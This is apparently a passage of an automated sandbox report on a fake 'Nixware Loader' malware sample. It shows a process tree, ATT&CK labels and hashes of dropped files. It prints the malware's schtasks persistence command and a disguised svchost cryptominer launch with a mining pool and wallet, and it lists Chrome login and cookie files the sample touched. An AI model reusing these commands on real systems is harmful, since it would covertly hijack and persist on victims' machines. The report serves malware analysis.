- Suspicious use of AdjustPrivilegeToken
PID:608

C:\Users\Admin\AppData\Local\Temp\win.exe
"C:\Users\Admin\AppData\Local\Temp\win.exe"
2⤵
- Executes dropped EXE
PID:2412

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\win.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
4⤵
PID:2336

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
5⤵
- Creates scheduled task(s)
PID:2256

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
4⤵
- Loads dropped DLL
PID:1064

C:\Users\Admin\AppData\Local\Temp\services64.exe
C:\Users\Admin\AppData\Local\Temp\services64.exe
5⤵
- Executes dropped EXE
PID:2808

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
6⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2568

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
7⤵
- Executes dropped EXE
PID:2916

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
8⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=86RZCQ8EgRhKRiXETMJ5po96wf7wKt8JwW3c54CNXDpYbLikb9YvG6ei6KCDBgidyyYqfYR6zNoCKf3BbJrGPCoYMuh4nVW --pass=nixware --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=70 --tls --cinit-stealth
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932

C:\Users\Admin\AppData\Local\Temp\Nixware Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Nixware Loader.exe"
2⤵
- Executes dropped EXE
PID:2448

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Tg.bat" "
2⤵
PID:1596

C:\Windows\SysWOW64\explorer.exe
explorer https://t.me/nixware_support
3⤵
PID:2532

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:2540

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://t.me/nixware_support
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2620

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2620 CREDAT:275457 /prefetch:2
3⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6804f50,0x7fef6804f60,0x7fef6804f70
2⤵
PID:1732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1344 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1068 /prefetch:2
2⤵
PID:1656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1840 /prefetch:8
2⤵
PID:2184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2024 /prefetch:1
2⤵
PID:2636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:1
2⤵
PID:2180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
2⤵
PID:1060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1412 /prefetch:2
2⤵
PID:2844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2332 /prefetch:1
2⤵
PID:1764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1428 /prefetch:8
2⤵
PID:2092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3624 /prefetch:8
2⤵
PID:2888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3708 /prefetch:8
2⤵
PID:2796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1480 /prefetch:1
2⤵
PID:3056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
2⤵
PID:1256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4412 /prefetch:8
2⤵
PID:2732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4360 /prefetch:8
2⤵
PID:1700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4396 /prefetch:8
2⤵
PID:2860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4328 /prefetch:8
2⤵
PID:2260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3760 /prefetch:8
2⤵
PID:980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1060,13970553167482449847,15922442188069739508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4340 /prefetch:8
2⤵
PID:1792

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1148

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
01edd662bf41d5bbff2f446329c07ce1

SHA1
92d9f404265408460eac72a6a69616b21d4e7fd4

SHA256
eec0d892828314ac31d76185fb96f4bc9345707c7a181ac6d101d728f74cacdb

SHA512
6a2df29e343678f61a5b1af982627771a9ff1bc84f01f8046224259748f6062fc4bc042fcf032651489c1c7b4e5e4a32127a985d575e4554c71abc7706541ef2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
6af6ce211c2ab59fccfacb95b2a2ac48

SHA1
1d384947dcac567774034a8c0354fe10f1eb3b31

SHA256
db6b2effffc703723197d276bbe9dce9a6ad16b47cc12d61f7bfea0be88a7bd4

SHA512
8c4e58c9140e41dc243b9d168163da939691e6bdff1b8963f4dd04f0a73f38e0eedb285eca230a1cf24f547bda648a3b30ff2843b10138b95fba35dd7bb162ec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0

Filesize
44KB

MD5
0c865693c9174441575de7237a9d7291

SHA1
32cedf69ac976fbfb3d2510ec047a7c375a01605

SHA256
e49a8a8d4cfa3672b350dce70297e96a33f698316ce679811324805eed7be5c2

SHA512
1d983693b302fdd90366ea643995d6c93bf7572426cef21f468c3fee38129f3ae2973f7176f2c910bcd1e13a8ab7def4c27d78124afe4b985d327d2a36f0810b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1

Filesize
264KB

MD5
e80a41dcd485ce7a7711ee0dae1a305d

SHA1
6124a3beb29fce0bf930dcd5bafce4aef4065ee4

SHA256
a046c87dc0bb6a6061ac9c761dd570b50f6d8bcdba4658df8bf86e74efc8c44a

SHA512
bd1d5f886141e5738a654461aefc8f3d6ce4fa8d74d90a61b78a532b60490aab6f921d7ba5a53af2c2d64dec2c2d5cc9bf9c230404c01b0e7df6b3b736c90cdb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2

Filesize
1.0MB

MD5
0665d4bb47a3e65cde73e2562db9a762

SHA1
7d940053f1badcfb2da39f862b2f43b9588319b4

SHA256
544d898b974ed1dc3ece5be05c464d207e3f70ab5e42c0bda5491ebf6edfebc7

SHA512
2f6d9effda0d4d9fc07b03fa9e95dbd5221cda6f0fad1b1d6b362951bf0f5d633eb78aa4f5bbe86990e5d0f3eb33284f933fb9c2e48a9f6b26e0614a731aa435

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3

Filesize
4.0MB

MD5
bf89c36a91dd4a6366234a9d7c13d444

SHA1
603a3513f921c41b8e329fc395499058ccb23e50

SHA256
f64e5e47aab6c552a2069e3799d2f069428087efbcd393ee0b2c521043aa4d6e

SHA512
ead316040e3fa71da5bc640c1e35f20afc0f56a330b1570b43cc8c93516718d307c90356e3186be9acbf88b698a5014b561761ab337ee9a77d4e053e217c4e83

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
552B

MD5
6f46f45b954c6f3801674249d77727cf

SHA1
7641ceac729879f178993c9a7e9f68bfba0e657c

SHA256
a3817f8ead9560432157558e1a40cf57552fd28c77f7ae830d38592286877b51

SHA512
65ba6d43b47e1734bfd7fcfeca9c9771a26f60fc75cb6f7c5fe3cb487767a41e302f7ad78033888f53f7e6d3bc253f1c0df4d1ed422e5e6c55be4f8ffd4736f1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies

Filesize
20KB

MD5
9331d249c36d00960f0bd8b5eb74f9cd

SHA1
03186fbceffb80c32292ce464266da587e41218a

SHA256
4b1cf6eca332cd788e24736e87b6eeeea762c4e2ea78d30f01b430efc79da1db

SHA512
06e2fd4e982661e128d17500642b3db87c4fa28d69a1e5df0549dc4d3511973a9e0126821ef46cdedf51682f83334ca640fefdb86063b664f633fe794f010c2a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies

Filesize
20KB

MD5
2b131a38d52f47ee4b0114b5108b2219

SHA1
8bd807bfc2e7bb472eab86e343dcc4b54679ed95

SHA256
a6bb077207502b241bb85a160f7396e21877779e7fdbfff70b1985c23fce1c21

SHA512
c807a493e5f76f338eb2b9cb663f1a6fc7e39bc4d78fff8a287296672568ccc7ca80d4cd643dbfa70fedfd95392a4fa5d6bccd12cea66a5007ec7c539724fd3a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal

Filesize
12KB

MD5
61d135c16c07ab770fa31677678c9f0b

SHA1
c78aee52aa02a04b098e39ca1ecdb7e77ac85c2d

SHA256
c37f74e4fd152233adb910381d6e37c7c0c47514017521b08abe556eb6e17b41

SHA512
2108b5118f4d05c5169b83af555e7ec65dbc4388d36ca421a01e7f2fa88f340eea7b12b8a2bfd46e8936970f608438b9d6d5743809ea36710c38d9dc572539fe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
279f601a26caea426657d33b09864d66

SHA1
a71346ac8d8971b3e1cb0c39aefbc04eeba20cda

SHA256
dfffbb2cf5765fce58e603122a7d107e1516dd6f71684ffb52edf9aed79ac2a9

SHA512
b1f29f830ed51d53c447015c1ed49a6d7547ad13116ddb4671fe9dadbfcda73b4dbca0a71e05bb28374accf37fafc1a5c8fdbd656b26f8a9276a6b826534c87a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

Filesize
116KB

MD5
8a01cdee1a379ae1745bd23016087f24

SHA1
6b669c5a37a7f03d56b0a8290d5a2ea0caaba040

SHA256
26806d3da1f37089bc56006b858cc6d3f38754acd60371ddcc2f851615fd4e23

SHA512
32609d37f3858f8c43e2d15cee5037d3e5f6fed32e2f67226d9bf0400ba9a20e16520c8b6a6025e1cdcb6a37bd0fd7210e942792c0cb921243664ea7922f2826

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account

Filesize
40KB

MD5
b608d407fc15adea97c26936bc6f03f6

SHA1
953e7420801c76393902c0d6bb56148947e41571

SHA256
b281ce54125d4250a80f48fcc02a8eea53f2c35c3b726e2512c3d493da0013bf

SHA512
cc96ddf4bf90d6aaa9d86803cb2aa30cd8e9b295aee1bd5544b88aeab63dc60bb1d4641e846c9771bab51aabbfbcd984c6d3ee83b96f5b65d09c0841d464b9e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State

Filesize
4KB

MD5
dab518c6025649eefd8864ce698e2862

SHA1
7a0c3096e85640657a19c3ed2fb5a9967b0d6930

SHA256
c0fdea450ac00bfedd410592da836275d2bc4624998ff81a78ad6ee78de39038

SHA512
0bf20e138c75fee1771ab3c5e62c8128faa78d913f3f5bccc63b32965b57c4944d514b29302d348e0d07a893d17c26abd9f829ee2603e4021124594788f6e8d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG

Filesize
331B

MD5
c507da0d28cae145c6efc3a73be03e92

SHA1
6833f2ef3460f66a524227d088a0ceb72eeacb3f

SHA256
2233da79e667c73d57d1a02ef6a62331ea8eb21c6c7bc527c301b92ea5259098

SHA512
312c235fd876c8edcdcd7311ba5c90ae1cbc3bf04ba352aae9a066db8a7409b1939ca5668c28ad1e38b52b3f654bd54b2604164d1872a58171fbd8673a75fba2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
846b584b4c2c63804771d6db4e0e1b30

SHA1
49318b2ed3c6e3c69e8101c2a8557273fec513f9

SHA256
b9e8499548200e8ac7ce2d75089f6592090e481c3d8924926df14e74acdc6933

SHA512
51be1f5d01183964fc9224c4a5c376749949a7e5846a88b6d6175479edb1891d4893316207a1e2bacf6f0ec5114c085cc06061265692f8b242e8f8345f97ccd7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
91f151df5c688d7ecdaca737421a5f7a

SHA1
78fd21860aa3ece6239ac3ba82a18391f085796d

SHA256
fa20328115125433c15abdc83710af5d547850a50acd948e8357dcf224fbef12

SHA512
c2299989baf3fbf0bba01c8d8fffc373758e15e245ff9488de0806aa5a241d70b151fcec1a0f3918f2359d338afd48811bb4ce1ee62bb8e98474aa8d0262d2bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13313327149891800

Filesize
2KB

MD5
8fa91babb155826ce87b80e4406d9c74

SHA1
3c9390c861da8fc483e18e29b497f484b130ac48

SHA256
cb0f3c854e80531e8809d468b8e13f30a337ece0dfb5ba8481fe245d7078b1d7

SHA512
ad7d92e6089858b96dfc439b6204b15caa179381278f44c31656be87675f032c6a198d60bf8b46a144e62f119bde0c827c13fb86ed967440f302d0aae231e9cc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log

Filesize
112B

MD5
17232c243e50ddf009d73ace3200b545

SHA1
263d397db120843a1aaad98dc64712b8c488a5db

SHA256
b22b0b7e44a13c8e0a1dd66d10f5002a811140fe8a99fe5f92d0dc1cab553199

SHA512
ef4dee8afdf36981f70967f8532f2c0aac418a3a519bae8619e353175279accc8af96877e64c284fa1843ac43ae8326d4a4ebcb136bc781b07d36d8fdabbfa6f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG

Filesize
345B

MD5
43c65a41c79b3b949ea98ee56cb5bef7

SHA1
ccd47af2ee1b57aae636784c042073ba90038cca

SHA256
85c83cfbb2c973f0fc75d3ff37e3803fbbc82f5658a17b26122e90ced2530ebd

SHA512
0604a2b1869a7daa794ffd3335b3474686415ec1bb6d0962504c2f4e630c98940cf378c3900321198e5ee8677e0ded22ebd12fbd8b304b4f49179671f303748d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

Filesize
160B

MD5
de92ad90be6d3364745b2f73f4c3cf73

SHA1
9158681463bd30e5af4dda4baac81f93cedbda77

SHA256
0025a3e0d3b834401b3b5f820e1991ef7e810d9a4b8b6b579e6301c94e7031a0

SHA512
9e81cefc195439439f4b23ee7696309d7bc3c08e5b444d2abde26d2f12b2d3bcfd124fb9a2d40c6389e9f787741676fad366a2e9982674e7b931028c014d8a79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

Filesize
321B

MD5
0fe000a6b0d77df15c3c4670c945906a

SHA1
402ac3a265c63ccf593c7176214a6a5e5926f40a

SHA256
9e19c3d87448aeffae44864b0145e01541a0801294affdb9e43e64e278540c80

SHA512
6736689e447c74961564fb70be9a6de69321755af88fb515546d15f8c62fbfbeb123124f7d8677dbd51a5f9ab3da97a4478dd1f37e2ef233fc9d13460e6d065d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity

Filesize
1016B

MD5
4acb17512adeaf8c8aa415b0c7f8c901

SHA1
a453ab80829b4bad4afdd0e852a4ccc6b66bf850

SHA256
107383aba64a0eef10022fb0088126f6bdf89ae920897eae9ace99287aa0da52

SHA512
35a0a932eb6154092cb3e61b88db2abdd3d1bbd5d9f2077b5b187a5ddca2beee0d1412310ffa79fa3c2b2460774a51ac61f1484300ff81fdd1a3a81bc91f4688

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Visited Links

Filesize
128KB

MD5
da9171dd9b6b91f5fda604c2de38fe07

SHA1
3f4c15356ac389f708b468c3ce45316fa9cbc186

SHA256
53960d4676013d9fd9ff9282a1dadf266672a494963162ac695920d7396c82b5

SHA512
952998e6361bd16948cbc249b5f2b4423bd2986cdff3a6e62a273b265360707af5476229e53a3fa51ed807ab387b60d84f4172c02454e95feee264022c42f912

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

Filesize
13B

MD5
b63048c4e7e52c52053d25da30d9c5ab

SHA1
679a44d402f5ec24605719e06459f5a707989187

SHA256
389caa40ea458e84bc624a9af1e0dec60fa652b2db2b81c09b1dfe22822cc3d1

SHA512
e86c58c5a25e24f21ad79ed526a90c120a09c115f4820663bd2ebbc59e7bb1c4c418267eb77645522aa20b2c1b53fba8e31690db7bae9b21e4eff3db06316359

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
205KB

MD5
ab22d17596cc0ac398110bfb9e8116c4

SHA1
7b46c6917662b1e62f6cbbeba6c5537fdd47b2b8

SHA256
d0c800b18ac36a77ff5889c28167dc0c830b41dbf938bbe270b8a25aca4d4fe2

SHA512
628c8f0669c752313a59fbfbe3f806f23d0139f0316535a9b06ecb85d234cfc449776baf321f55b2ce40e98e1ad9ff3bd84141b0739b24da10e7814a15868b30

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
205KB

MD5
b654882b8549281a66a744a8b2e15b5c

SHA1
e2f928238aff08de02491fd80f28867f7fbc941b

SHA256
ff08b89f327e2692e5d60cc2e05bbb4e8c5cbcb935065d79bb7dbcb878870287

SHA512
8c3961706532a9b3ddbc5ef8415c77e545734715fe0c27fdafe37720a637913595049791f3b597d6b3241b02d9fc10b1c9d0cea7eab0dd9689107e1d30c9c888

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
29e2cc9729a76b09a5e6b84459ef40d9

SHA1
2d160cbe56e2a237fab1ed1ef4c9d6e852a8f85f

SHA256
dee804d7e8a39fa952fca2aa7b5f63bb363ac7d8c61f5e83135eab5d44eedfe4

SHA512
366a5cdc38116402040a7a2c51741b0d60335df096e51abd17cd9dc881f35f68a02661a873b3063ed32e1b3c1929f945631e138e5d34b95d9b5a89daf8039a24

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
274KB

MD5
24a51d78647223ee11b910e14f2a30b1

SHA1
22efce1a9f8dbac3a79367a8b0911307703ee46d

SHA256
f07a6569599e817964fadf806eb0a87e3420179fbc23623a3f2ef395dc4a27f5

SHA512
007acfe559face066ee489ba8aff4b894f1a44265433fa221ad5844bc118fcb6adde159bef1fc4e7675c88ad74fcc9e1fc1966b6c44b261ce4bd6160534ca867

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
274KB

MD5
24a51d78647223ee11b910e14f2a30b1

SHA1
22efce1a9f8dbac3a79367a8b0911307703ee46d

SHA256
f07a6569599e817964fadf806eb0a87e3420179fbc23623a3f2ef395dc4a27f5

SHA512
007acfe559face066ee489ba8aff4b894f1a44265433fa221ad5844bc118fcb6adde159bef1fc4e7675c88ad74fcc9e1fc1966b6c44b261ce4bd6160534ca867

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nixware Loader.exe

Filesize
19KB

MD5
17f672a433b839d5a307e7c832c55b23

SHA1
18ac995567d8cbe3977ccaa6af017f464115a6f2

SHA256
2798489b1dcb73e61e5a38e4655e5f48843f7a5b6d1387349fbb0c0bbc42943f

SHA512
6fffce3343ef81779c3d8f3c26418e195c87be8199b62d5d0066e89f41bf13a5fae616135eb34201c92bcafee2fee9a7bc8f847d589818d16fa3945c84a45cd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nixware Loader.exe

Filesize
19KB

MD5
17f672a433b839d5a307e7c832c55b23

SHA1
18ac995567d8cbe3977ccaa6af017f464115a6f2

SHA256
2798489b1dcb73e61e5a38e4655e5f48843f7a5b6d1387349fbb0c0bbc42943f

SHA512
6fffce3343ef81779c3d8f3c26418e195c87be8199b62d5d0066e89f41bf13a5fae616135eb34201c92bcafee2fee9a7bc8f847d589818d16fa3945c84a45cd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tg.bat

Filesize
37B

MD5
41a34775ffcdc8f6f1f6e41da726bf1a

SHA1
eaec7d7e7dce8dae096cdaa644eae73ab8250aca

SHA256
47a6ec039d3f8f3977a93166b9f66b47ffc5a9c306345655678c4a12100a46a5

SHA512
4cbb4ed909001e6ab439f0bccae6813e04293436307c2e85d0d238d0319c9c70a17163e3f83602c773b744d4d023f732350806bc216f7a6c598426db0da180d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\services64.exe

Filesize
2.1MB

MD5
d8abaf1076d66e5f87487588d8043183

SHA1
54027b5e8f86bf2dbb4b6ea46f8b24a9cde3002a

SHA256
9c14204dfa2fc52b7f411cff3d8d3e909410ad8607407860e50eb01f6d3bb291

SHA512
e4e26e5687f9097fbad3791ab6dd15740094c192a8f078805c4adbb059e2770e747118e50477ae44ecded15152c12df77ef96ebd492990b6d662852792ed8bed

Download Submit
C:\Users\Admin\AppData\Local\Temp\services64.exe

Filesize
2.1MB

MD5
d8abaf1076d66e5f87487588d8043183

SHA1
54027b5e8f86bf2dbb4b6ea46f8b24a9cde3002a

SHA256
9c14204dfa2fc52b7f411cff3d8d3e909410ad8607407860e50eb01f6d3bb291

SHA512
